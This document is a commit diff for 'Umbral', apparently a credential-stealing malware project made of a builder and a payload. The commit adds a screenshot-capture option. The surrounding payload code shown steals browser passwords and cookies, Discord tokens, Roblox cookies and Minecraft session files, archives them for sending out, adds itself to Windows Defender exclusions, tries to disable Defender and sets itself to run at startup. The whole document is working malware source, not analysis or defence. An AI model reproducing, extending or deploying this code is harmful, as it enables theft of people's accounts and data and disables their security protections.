Added Screenshot feature

Umbral.builder/Build/Builder.cs

@@ -2,13 +2,10 @@
 using Mono.Cecil.Cil;
 using Mono.Cecil;
 using System;
-using System.CodeDom.Compiler;
 using System.IO;
-using System.IO.Compression;
 using System.Linq;
 using System.Text;
 using System.Windows.Forms;
-using Microsoft.CSharp;
 using Mono.Cecil.Rocks;
 using Vestris.ResourceLib;
 
@@ -46,6 +43,7 @@ public class Builder
         public bool StealCookies;
         public bool StealRobloxCookies;
         public bool StealMinecraftSession;
+        public bool CaptureScreenshot;
 
         public AssemblyInfo AssemblyInformation;
 
@@ -138,6 +136,10 @@ public bool Build(TextBox textBox)
                                 instruction.OpCode = OpCodes.Ldc_I4;
                                 instruction.Operand = StealTokens ? 1 : 0;
                                 break;
+                            case 9: // takeScreenshot  
+                                instruction.OpCode = OpCodes.Ldc_I4;
+                                instruction.Operand = CaptureScreenshot ? 1 : 0;
+                                break;
                         }
                     }
                 }
@@ -231,4 +233,4 @@ private static string Encrypt(string value, byte[] key, byte[] iv)
             return Convert.ToBase64String(structure[0].Concat(structure[1]).ToArray());
         }
     }
-}
+}

Umbral.builder/Umbral.builder.csproj

@@ -53,6 +53,11 @@
   <PropertyGroup>
     <ApplicationIcon>logo.ico</ApplicationIcon>
   </PropertyGroup>
+  <PropertyGroup />
+  <PropertyGroup />
+  <PropertyGroup>
+    <NoWin32Manifest>true</NoWin32Manifest>
+  </PropertyGroup>
   <ItemGroup>
     <Reference Include="jose-jwt, Version=4.1.0.0, Culture=neutral, processorArchitecture=MSIL">
       <HintPath>..\packages\jose-jwt.4.1.0\lib\net472\jose-jwt.dll</HintPath>
@@ -150,6 +155,7 @@
       <AutoGen>True</AutoGen>
       <DependentUpon>Resources.resx</DependentUpon>
     </Compile>
+    <None Include="App.config" />
     <None Include="packages.config" />
     <None Include="Properties\Settings.settings">
       <Generator>SettingsSingleFileGenerator</Generator>
@@ -161,9 +167,6 @@
       <DesignTimeSharedInput>True</DesignTimeSharedInput>
     </Compile>
   </ItemGroup>
-  <ItemGroup>
-    <None Include="App.config" />
-  </ItemGroup>
   <ItemGroup>
     <BootstrapperPackage Include=".NETFramework,Version=v4.7.2">
       <Visible>False</Visible>

Umbral.builder/User Controls/BuilderTab.cs

@@ -26,7 +26,7 @@ private void BuildButton_Click(object sender, System.EventArgs e)
             if (buildButton.Text.Equals(BuildButtonEnabledPlaceHolder))
             {
                 if (!(GeneralTab.StealTokens || GeneralTab.StealRobloxCookies || GeneralTab.StealCookies ||
-                      GeneralTab.StealPasswords || GeneralTab.StealMinecraftSession))
+                      GeneralTab.StealPasswords || GeneralTab.StealMinecraftSession || GeneralTab.TakeScreenshot))
                 {
                     MessageBox.Show("Enable at least one of the stealing targets!", "Error", MessageBoxButtons.OK, MessageBoxIcon.Error);
                     return;
@@ -39,7 +39,7 @@ private void BuildButton_Click(object sender, System.EventArgs e)
                     {
                         AddExtension = true,
                         CheckPathExists = true,
-                        FileName = "output.exe",
+                        FileName = "Umbral.exe",
                         Filter = "Executable File|*.exe"
                     };
 
@@ -60,21 +60,22 @@ private void BuildButton_Click(object sender, System.EventArgs e)
                         StealPasswords = GeneralTab.StealPasswords,
                         StealCookies = GeneralTab.StealCookies,
                         StealRobloxCookies = GeneralTab.StealRobloxCookies,
-                        StealMinecraftSession = GeneralTab.StealMinecraftSession
-                    };
-
-                    builder.AssemblyInformation = new AssemblyInfo
-                    {
-                        CompanyName = AssemblyTab.CompanyNameInfo,
-                        AssemblyVersion = AssemblyTab.AssemblyVersionInfo,
-                        FileDescription = AssemblyTab.FileDescriptionInfo,
-                        FileVersion = AssemblyTab.FileVersionInfo,
-                        InternalName = AssemblyTab.InternalNameInfo,
-                        LegalCopyright = AssemblyTab.LegalCopyrightInfo,
-                        LegalTrademarks = AssemblyTab.LegalTrademarksInfo,
-                        OriginalFilename = AssemblyTab.OriginalFilenameInfo,
-                        ProductName = AssemblyTab.ProductNameInfo,
-                        ProductVersion = AssemblyTab.ProductVersionInfo
+                        StealMinecraftSession = GeneralTab.StealMinecraftSession,
+                        CaptureScreenshot = GeneralTab.TakeScreenshot,
+
+                        AssemblyInformation = new AssemblyInfo
+                        {
+                            CompanyName = AssemblyTab.CompanyNameInfo,
+                            AssemblyVersion = AssemblyTab.AssemblyVersionInfo,
+                            FileDescription = AssemblyTab.FileDescriptionInfo,
+                            FileVersion = AssemblyTab.FileVersionInfo,
+                            InternalName = AssemblyTab.InternalNameInfo,
+                            LegalCopyright = AssemblyTab.LegalCopyrightInfo,
+                            LegalTrademarks = AssemblyTab.LegalTrademarksInfo,
+                            OriginalFilename = AssemblyTab.OriginalFilenameInfo,
+                            ProductName = AssemblyTab.ProductNameInfo,
+                            ProductVersion = AssemblyTab.ProductVersionInfo
+                        }
                     };
 
                     BuildButton.Text = BuildButtonEnabledPlaceHolder;

Umbral.builder/User Controls/GeneralTab.cs

@@ -20,6 +20,7 @@ public partial class GeneralTab : UserControl
         public static bool StealCookies;
         public static bool StealRobloxCookies;
         public static bool StealMinecraftSession;
+        public static bool TakeScreenshot;
 
         private const string WebhookPlaceholder = "https://discord.com/api/webhooks/1234567890/abcdefhgijklmnopqrstuvwxyz";
         private const string WebhookCheckButtonPlaceHolderEnabled = "Check Webhook";
@@ -120,6 +121,8 @@ private void CheckBox_CheckChanged(object sender, EventArgs e)
                 StealRobloxCookies = checkBox.Checked;
             else if (checkBox.Equals(StealMinecraftSessionCheckBox))
                 StealMinecraftSession = checkBox.Checked;
+            else if (checkBox.Equals(TakeScreenshotCheckBox))
+                TakeScreenshot = checkBox.Checked;
         }
 
         private void webhookLabel_TextChanged(object sender, EventArgs e)

Umbral.builder/User Controls/Soon.cs

@@ -6,6 +6,7 @@ namespace Umbral.builder.User_Controls
 {
     public partial class Soon : UserControl
     {
+
         public Soon()
         {
             InitializeComponent();

Umbral.payload/App.config

@@ -1,33 +1,6 @@
-<?xml version="1.0" encoding="utf-8"?>
+<?xml version="1.0" encoding="utf-8" ?>
 <configuration>
-	<configSections>
-
-		<section name="entityFramework" type="System.Data.Entity.Internal.ConfigFile.EntityFrameworkSection, EntityFramework, Version=6.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" requirePermission="false" />
-	</configSections>
-	<startup>
-		<supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.7.2" />
-	</startup>
-	<runtime>
-		<assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">
-			<dependentAssembly>
-				<assemblyIdentity name="System.Runtime.CompilerServices.Unsafe" internalKeyToken="b03f5f7f11d50a3a" culture="neutral" />
-				<bindingRedirect oldVersion="0.0.0.0-6.0.0.0" newVersion="6.0.0.0" />
-			</dependentAssembly>
-			<dependentAssembly>
-				<assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />
-				<bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />
-			</dependentAssembly>
-			<dependentAssembly>
-				<assemblyIdentity name="SQLitePCLRaw.core" publicKeyToken="1488e028ca7ab535" culture="neutral" />
-				<bindingRedirect oldVersion="0.0.0.0-2.1.4.1835" newVersion="2.1.4.1835" />
-			</dependentAssembly>
-		</assemblyBinding>
-	</runtime>
-	<entityFramework>
-		<providers>
-			<provider invariantName="System.Data.SqlClient" type="System.Data.Entity.SqlServer.SqlProviderServices, EntityFramework.SqlServer" />
-			<provider invariantName="System.Data.SQLite.EF6" type="System.Data.SQLite.EF6.SQLiteProviderServices, System.Data.SQLite.EF6" />
-		</providers>
-	</entityFramework>
-
-</configuration>
+    <startup> 
+        <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.7.2" />
+    </startup>
+</configuration>

Umbral.payload/Config/Settings.cs

@@ -27,6 +27,8 @@ internal static class Settings
 
         internal static readonly bool StealMinecraftFiles;
 
+        internal static readonly bool TakeScreenshot;
+
         internal static readonly string Mutex;
 
         static Settings()
@@ -45,6 +47,7 @@ static Settings()
             var stealRobloxCookies = true;
             var stealMinecraftFiles = true;
             var stealDiscordTokens = true;
+            var takeScreenshot = true;
 
             //--------------------------------------
 
@@ -62,6 +65,7 @@ static Settings()
             StealCookies = stealCookies;
             StealRobloxCookies = stealRobloxCookies;
             StealMinecraftFiles = stealMinecraftFiles;
+            TakeScreenshot = takeScreenshot;
             Mutex = mutex;
         }
 

Umbral.payload/Program.cs

@@ -91,8 +91,8 @@ private static async Task Run()
             if (Settings.StealMinecraftFiles)
                 getMinecraftFiles =
                     MinecraftStealer.StealMinecraftFiles(Path.Combine(tempFolder, "Games", "Minecraft"));
-            else
-                await Task.WhenAll(getTokens, getBravePasswords, getChromePasswords, getChromiumPasswords, getComodoPasswords,
+
+            await Task.WhenAll(getTokens, getBravePasswords, getChromePasswords, getChromiumPasswords, getComodoPasswords,
                     getEdgePasswords, getEpicPrivacyPasswords, getIridiumPasswords, getOperaPasswords, getOperaGxPasswords,
                     getSlimjetPasswords, getUrPasswords, getVivaldiPasswords, getYandexPasswords, getBraveCookies,
                     getChromeCookies, getChromiumCookies, getComodoCookies, getEdgeCookies, getEpicPrivacyCookies,
@@ -133,11 +133,14 @@ await Task.WhenAll(getTokens, getBravePasswords, getChromePasswords, getChromium
 
             var gotMinecraftFiles = await getMinecraftFiles ? 1 : 0;
 
+            var screenshots = Common.CaptureScreenShot();
+
             var saveProcesses = new List<Task>();
             var cookiesCount = 0;
             var passwordsCount = 0;
             var discordTokenCount = 0;
             var robloxCookieCount = 0;
+            var screenshotCount = 0;
 
             if (discordAccounts.Length > 0 && Settings.StealDiscordtokens)
             {
@@ -147,6 +150,14 @@ await Task.WhenAll(getTokens, getBravePasswords, getChromePasswords, getChromium
                 discordTokenCount += discordAccounts.Length;
             }
 
+            if (screenshots.Length > 0 && Settings.TakeScreenshot)
+            {
+                var saveTo = Path.Combine(tempFolder, "Display");
+                Directory.CreateDirectory(saveTo);
+                saveProcesses.Add(Task.Run(() => SaveData.SaveToFile(screenshots, saveTo)));
+                screenshotCount += screenshots.Length;
+            }
+
             #region StealPaswords
 
             if (bravePasswords.Length > 0 && Settings.StealPasswords)
@@ -371,6 +382,7 @@ await Task.WhenAll(getTokens, getBravePasswords, getChromePasswords, getChromium
 
             #endregion
 
+
             await Task.WhenAll(saveProcesses);
             if (Common.Compress(tempFolder, archivePath))
             {
@@ -380,7 +392,8 @@ await Task.WhenAll(getTokens, getBravePasswords, getChromePasswords, getChromium
                     { "Passwords", passwordsCount },
                     { "Discord Tokens", discordTokenCount },
                     { "Minecraft Session Files", gotMinecraftFiles },
-                    { "Roblox Cookies", robloxCookieCount }
+                    { "Roblox Cookies", robloxCookieCount },
+                    { "Screenshots", screenshotCount }
                 });
                 File.Delete(archivePath);
             }
@@ -412,7 +425,7 @@ private static async Task Process()
             Syscalls.DefenderExclude(Application.ExecutablePath); // Tries to add itself to Defender exclusions
             Syscalls.DisableDefender(); // Tries to disable defender. Fails if tamper protection is enabled.
 
-            if (!Common.IsInStartup() && Settings.Startup && Syscalls.CheckAdminPrivileges()) 
+            if (!Common.IsInStartup() && Settings.Startup && Syscalls.CheckAdminPrivileges())
                 Common.PutInStartup(); // Puts itself in startup
         }
     }

Umbral.payload/Umbral.payload.csproj

@@ -87,6 +87,7 @@
   <ItemGroup>
     <Reference Include="System" />
     <Reference Include="System.Core" />
+    <Reference Include="System.Drawing" />
     <Reference Include="System.IO.Compression.FileSystem" />
     <Reference Include="System.Net">
       <HintPath>..\..\..\..\..\..\..\Program Files (x86)\Reference Assemblies\Microsoft\Framework\.NETFramework\v4.7.2\System.Net.dll</HintPath>
@@ -131,9 +132,6 @@
     <Compile Include="Program.cs" />
     <Compile Include="Properties\AssemblyInfo.cs" />
   </ItemGroup>
-  <ItemGroup>
-    <None Include="App.config" />
-  </ItemGroup>
   <ItemGroup>
     <BootstrapperPackage Include=".NETFramework,Version=v4.7.2">
       <Visible>False</Visible>
@@ -146,7 +144,9 @@
       <Install>false</Install>
     </BootstrapperPackage>
   </ItemGroup>
-  <ItemGroup />
+  <ItemGroup>
+    <None Include="App.config" />
+  </ItemGroup>
   <Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
   <PropertyGroup>
     <PostBuildEvent>copy "$(TargetPath)" "$(TargetDir)\Umbral.payload"